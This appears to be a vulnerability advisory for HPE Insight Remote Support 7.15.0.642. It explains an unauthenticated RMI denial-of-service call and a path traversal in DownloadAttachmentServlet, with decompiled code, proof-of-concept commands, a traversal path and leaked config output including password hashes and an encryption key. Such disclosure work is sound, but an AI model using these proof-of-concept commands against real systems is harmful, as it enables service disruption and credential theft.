HPE Insight Remote Support Multiple Vulnerabilities

Multiple vulnerabilities exist in HPE Insight Remote Support 7.15.0.642.

stopHPRSMain Unauthenticated DoS (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

The com.hp.uca.hprsmain.HPRSMain class in hprsMain.jar exposes a remote method named stopHPRSMain:

public interface IHPRSMainRemote extends Remote {

  void stopHPRSMain() throws RemoteException;

  String getRunningProcessStatus() throws RemoteException;

}

[...]

public class HPRSMain extends UnicastRemoteObject implements IHPRSMain, IHPRSMainRemote {

[...]

 public static void windowsRun() throws CanNotStartProcessException, CanNotStartMonitorException {

    if (!isHprsmainStopping) {

      RMIUtil.registerWithRMIService("hprsMain", instance);

[...]

// com.hp.uca.rmi.RMIUtil

public class RMIUtil {

  private static IUCALogger logger = UCALogger.getInstance(RMIUtil.class);

  private static Registry registry;

  private static int rmiPort;

  private static long delay;

  private static boolean db = logger.isDebugEnabled();

  static {

    rmiPort = UCAConfiguration.geti(UCAConfigurationKeys.HPRSMAIN_RMI_PORT, 7909);

    delay = UCAConfiguration.geti(UCAConfigurationKeys.HPRSMAIN_RMI_DELAY, 1500);

    setRegistry();

  }

  private static synchronized void setRegistry() {

    try {

      logger.info("Starting RMI registry on port '{}'", Integer.valueOf(rmiPort));

      registry = LocateRegistry.createRegistry(rmiPort);

      logger.info("RMI registry started on port '{}'", Integer.valueOf(rmiPort));

      delay();

    } catch (Exception e) {

      logger.info("RMI start failure {}", e.getMessage(), db ? e : null);

      try {

        registry = LocateRegistry.getRegistry(rmiPort);

[...]

  public static void registerWithRMIService(String rmiRegistryName, Remote instance) {

    logger.info("Preparing to register '{}' as a Remote object", rmiRegistryName);

    try {

      try {

        logger.info("Checking if '{}' is already registered", rmiRegistryName);

        if (null != registry.lookup(rmiRegistryName))

          logger.error("Unexpected {} is already registered", rmiRegistryName); 

      } catch (NotBoundException notBoundException) {}

      registry.rebind(rmiRegistryName, instance);

[...]

An unauthenticated remote attacker can invoke the method to terminate processes spawned by the HPRSMAIN Windows service.

PoC:

// rmg available at <https://github.com/qtc-de/remote-method-guesser>

java -jar rmg-5.1.0-jar-with-dependencies.jar call <target-host> 7909 --bound-name hprsMain --signature 'void stopHPRSMain()' --show-response

DownloadAttachmentServlet Path Traversal Information Disclosure (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

A path traversal vulnerability exists in method com.hp.uca.ui.servlets.DownloadAttachmentServlet.checkIfArbitraryFile(). A low-privileged Windows user can exploit it to download restricted files under the security context of SYSTEM.

  private boolean checkIfArbitraryFile(String path) {

    boolean result = true;

    File collectionOutputDir = FileLocator.getDynamicFile(UCAComponents.COLLECTION, "results");

    String collectionResultsPath = collectionOutputDir.getAbsolutePath();

    if (path != null && !path.isEmpty())

      // path traversal with: C:\ProgramData\HP\RS\DATA\collection\results\..\..\..\..\..\..\..\..\..\ProgramData\HP\RS\CONFIG\hprs.xml

      if (path.contains(collectionResultsPath)) 

        result = false;  

    return result;

  }

The HPRSMAIN Jetty web application uses Windows credentials for authentication. It assigns the operator role to a non-administrative Windows user who successfully logs in to the web application:

// com.hp.uca.auth.UCAWindowsLoginModule.login()

 public boolean login() throws LoginException {

 [...]

          String[] command = { this.executable, encrypt(this.userName), encrypt(this.password), "true" };

          if (logger.isDebugEnabled())

            showCommand(command); 

          ProcessBuilder pb = new ProcessBuilder(command);

          pr = pb.start();

          BufferedReader input = new BufferedReader(new InputStreamReader(pr.getInputStream()));

          String line = null;

          while ((line = input.readLine()) != null) {

            if (this.isDebugEnabled)

              logger.debug(line); 

            groups.add(line);

          } 

          if (groups.contains("S-1-5-32-544") || isinAdminGroup(groups, this.userName)) {

            if (this.isDebugEnabled)

              logger.debug("#SecEvt :  Administrators group passed"); 

            this.roles.add("administrator");

            this.roles.add("operator");

            this.groupName = "Administrators";

            this.isSuccess = true;

          } else if (groups.contains("S-1-5-32-547") && allowOperators) {

            if (this.isDebugEnabled)

              logger.debug("#SecEvt : Power Users group passed"); 

            this.roles.add("operator");

            this.groupName = "Power Users";

            this.isSuccess = true;

          } else if (groups.contains("S-1-5-32-545") && allowOperators) {

            if (this.isDebugEnabled)

              logger.debug("#SecEvt : Users group passed"); 

            this.roles.add("operator");

            this.groupName = "Users";

            this.isSuccess = true;

          } 

[...]

The operator role is assigned only if the "uca.allowauthuser" setting in hprs.xml is set to true:

  boolean allowOperators = UCAConfiguration.isSet(UCAConfigurationKeys.ALLOW_AUTH_USERS);

// com.hp.uca.configuration.UCAConfigurationKeys

public enum UCAConfigurationKeys {

[...]

 ALLOW_AUTH_USERS("uca.allowauthuser", null, UCAConfigurationKey.TYPE.GLOBAL, false),

[...]

}

The web.xml for the Jetty web application allows users with the operator role to access various protected URLs, including the one to access the DownloadAttachmentServlet (/remotesupport/getattachment):

<servlet-mapping>

<servlet-name>DownloadAttachmentServlet</servlet-name>

<url-pattern>/remotesupport/getattachment</url-pattern>

</servlet-mapping>

[...]

<security-constraint>

<web-resource-collection>

<web-resource-name>Remote Support UI</web-resource-name>

<url-pattern>/remotesupport/*</url-pattern>

</web-resource-collection>

<!-- force redirect to https.-->

<user-data-constraint>

       <transport-guarantee>CONFIDENTIAL</transport-guarantee>

     </user-data-constraint>

<!-- Comment out this auth-constraint block to disable authentication -->

<auth-constraint>

<role-name>administrator</role-name>

<role-name>operator</role-name>

</auth-constraint>

</security-constraint>   

[...]

The Jetty web application runs under the security context of SYSTEM. So if the "uca.allowauthuser" setting is set to true, a low-priv-user Windows user can perform a path traversal (via the DownloadAttachmentServlet) to download a file (i.e., hprs.xml) the user normally does not have access to.

PoC:

python3 hpe_irs_path_traversal.py -t <target-host> -u low-priv-user -p <password> -f '\\ProgramData\\HP\\RS\\CONFIG\\hprs.xml'

[*] Logging in as low-priv-user

[+] Login OK

[*] Performing path traversal: fetching C:\\ProgramData\\HP\\RS\\DATA\\collection\\results\\..\\..\\..\\..\\..\\..\\..\\..\\..\\ProgramData\\HP\\RS\\CONFIG\\hprs.xml

[+] Returned download link: <https://<target-host>>:7906/attachments/992c03e1-6051-41c8-b4b0-1d397fae6ee7.xml

[*] Fetching <https://<target-host>>:7906/attachments/992c03e1-6051-41c8-b4b0-1d397fae6ee7.xml

<?xml version="1.0" encoding="UTF-8" standalone="no"?>

<!DOCTYPE properties SYSTEM "<http://java.sun.com/dtd/properties.dtd>">

<properties>

<comment>Configuration saved at Thu Feb 06 00:17:22 EST 2025</comment>

<entry key="uca.allowauthuser">true</entry>

<entry key="hprsmain.db.old.su.password">0F971D0714C62FC2C3BB6AFA76B7859721CB29C6ACAD7C17A34C2BAB7D153410</entry>

<entry key="swm.package.url.server"><https://api.support.hpe.com/v1</entry>>

<entry key="uca.uuid">79fea801-ae5d-49b5-b3b6-aa434e59fd18</entry>

<entry key="listener.snmp4j.engineid">80:00:13:70:01:ac:1a:1c:6b:aa:68:5a:4c</entry>

<entry key="HpAdapter.Logging.Heartbeat">false</entry>

<entry key="uca.cliq.home">C:\\Program Files\\HP\\RS\\P4000\\</entry>

<entry key="uca.home">C:\\Program Files\\HP\\RS\\</entry>

<entry key="integration.adapters.emailadapter.collectionsent.suppressfor">Metrics_Collection</entry>

<entry key="hprsmain.db.encryption.key">198D16D8CFAE62FD19E55745DD27744C</entry>

<entry key="hprsmain.db.auth">md5</entry>

<entry key="hprsmain.db.hba.startup.ipv4.conf">host all all 127.0.0.1/32 trust</entry>

<entry key="backup.target">C:\\ProgramData\\HP\\RS\\DATA\\backup</entry>

<entry key="HpAdapter.Logging.EventSubmission">true</entry>

<entry key="hprsmain.db.hba.startup.ipv6.conf">host all all ::1/128 trust</entry>

<entry key="uca.home.ui">C:\\Program Files\\HP\\RS\\ui\\</entry>

<entry key="hprsmain.db.su.password">600502A039AB0D1F3A218763916A6069E07A9211FCA82BEDE1E65DB3CF284C72</entry>

[...]